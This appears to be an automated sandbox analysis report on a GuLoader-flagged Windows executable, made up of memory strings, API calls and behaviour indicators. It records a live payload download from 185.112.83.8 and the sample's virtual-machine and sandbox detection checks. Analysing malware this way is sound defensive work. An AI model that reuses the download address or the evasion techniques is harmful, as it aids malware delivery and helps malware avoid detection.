0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: o4XzTr73Ut.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060771307.000000001E88D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061244305.000000001EAC7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061518015.000000001F6FA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060591933.000000001E7CB000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060446492.000000001E707000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060874834.000000001E913000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061425020.000000001F689000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054172659.000000001F7BE000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054244376.000000001F82F000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060925849.000000001E944000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: global traffic HTTP traffic detected: GET /SoftwareCleanedPhilosf.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 185.112.83.8 Cache-Control: no-cache
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: o4XzTr73Ut.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_0040755C
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_00406D85
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_72891BFF
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A90CF
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A7CF3
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AB13E
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AA69C
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AA6B5
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A9627
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A6230
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AA647
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A9F92
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A7FD0
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A6BD0
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A63E0
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A8F10
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A9F10
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AA35F
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A1F6C
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A208B
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A9CA0
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A8003
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A685E
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A5078
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A85A9
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AA1CD
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A05F6
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A991C
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A8517
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A5D23
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AA146
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A6557
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000644F8
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000609C0
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00062A48
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00069E50
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_0006E590
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00064D70
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000F612F
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000F6B00
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000FED60
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000F7170
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000F9728
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000F9808
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00155C58
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00157FB8
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00152FE4
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A90CF NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A7CF3 NtAllocateVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AAC4D NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A6230 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A6BD0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A63E0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A8F10 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028AA35F NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A8003 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Process Stats: CPU usage > 98%
Source: o4XzTr73Ut.exe, 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamechrome.exe< vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp Binary or memory string: k,\\StringFileInfo\\040904B0\\OriginalFilename vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameIEXPLORE.EXED vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp Binary or memory string: OriginalFilename_.dll4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp Binary or memory string: OriginalFilename_.dll4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe, 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp Binary or memory string: OriginalFilename_.dll4 vs o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe Static PE information: invalid certificate
Source: o4XzTr73Ut.exe Virustotal: Detection: 7%
Source: o4XzTr73Ut.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe File read: C:\Users\user\Desktop\o4XzTr73Ut.exe
Source: o4XzTr73Ut.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Process created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Process created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe File created: C:\Users\user\AppData\Local\Yandex
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe File created: C:\Users\user\AppData\Local\Temp\nsl3A33.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/4@0/2
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_004021AA CoCreateInstance,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: o4XzTr73Ut.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: _.pdb source: o4XzTr73Ut.exe, 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 0000000C.00000000.841548004.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.843188696.00000000028A0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_728930C0 push eax; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A12B9 push ebp; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A8B9A push ecx; retf
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A17BD pushad ; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A1305 push ebp; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A5374 push edx; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A0088 push esp; retn 46BCh
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A3CE4 push esi; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A3C06 push esi; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A0859 pushfd ; iretd
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_028A996F push ebp; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00062A48 push esp; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_00062261 push ecx; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_0006B530 push esp; iretd
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000FD4D0 push cs; ret
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 12_2_000FF950 push eax; iretd
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Code function: 0_2_72891BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe File created: C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dll
Source: C:\Users\user\Desktop\o4XzTr73Ut.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        Tries to detect Any.run
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | File opened: C:\Program Files\qga\qga.exe
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://185.112.83.8/SOFTWARECLEANEDPHILOSF.BIN
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe TID: 5080 | Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe TID: 2020 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_028A9B85 rdtsc
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Window / User API: threadDelayed 368
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Window / User API: threadDelayed 1434
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 12_2_000F0012 sldt word ptr [eax]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | Code function: 0_2_0040290B FindFirstFileW,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe | System information queried: ModuleInformation
